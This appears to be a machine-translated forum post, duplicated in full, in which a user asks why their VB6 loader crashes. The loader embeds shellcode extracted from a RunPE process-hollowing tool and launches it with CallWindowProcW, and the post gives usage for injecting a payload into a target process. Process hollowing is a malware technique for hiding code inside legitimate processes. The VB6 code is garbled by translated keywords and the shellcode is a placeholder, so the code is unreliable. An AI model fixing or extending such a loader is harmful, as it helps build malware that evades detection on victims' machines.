Process-Hollowing/Source/Process Hollowing/Process_Hollowing.cpp at main · adamhlt/Process-Hollowing - runpe
Здравейте, извлякох shellcode от този runpe, след което се опитах да го вградя във vb6, кодът изглежда така. Когато стартирам изпълнимия файл, получавам „Werefault“, въпреки че няма грешка при компилиране. Подозирам, че тук е проблемът.
"CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0"
и най-вече
"CallWindowProcW VarPtr(shellcode(0))"
Мисля, че трябва да каже на Runpe от кой байт да започне изпълнението, но нямам представа. Някакви идеи? Мисля, че няма "0"
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) Докато
Public Sub RunPE(ByVal payload() Като байт, ByVal път като низ)
Dim ShellCode като низ
shellcode = "shellcode.............
............."
Dim byteArray() като байт
ReDim byteArray((Len(ShellCode) \ 2) - 1) 'прочетени байтове
За i = 1 To Len(ShellCode) Стъпка 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2)) k = k + 1
Следваща i
CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0
End Sub
Как да използвам
runpe.exe <полезен товар> <целеви процес>
o kadar aptalım ki vb6 64 bit dosyaları derleyemiyorum….
Здравейте, извлякох shellcode от този runpe, след което се опитах да го вградя във vb6, кодът изглежда така. Когато стартирам изпълнимия файл, получавам „Werefault“, въпреки че няма грешка при компилиране. Подозирам, че тук е проблемът.
"CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0"
и най-вече
"CallWindowProcW VarPtr(shellcode(0))"
Мисля, че трябва да каже на Runpe от кой байт да започне изпълнението, но нямам представа. Някакви идеи? Мисля, че няма "0"
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) Докато
Public Sub RunPE(ByVal payload() Като байт, ByVal път като низ)
Dim ShellCode като низ
shellcode = "shellcode.............
............."
Dim byteArray() като байт
ReDim byteArray((Len(ShellCode) \ 2) - 1) 'прочетени байтове
За i = 1 To Len(ShellCode) Стъпка 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2)) k = k + 1
Следваща i
CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0
End Sub
Как да използвам
runpe.exe <полезен товар> <целеви процес>
o kadar aptalım ki vb6 64 bit dosyaları derleyemiyorum….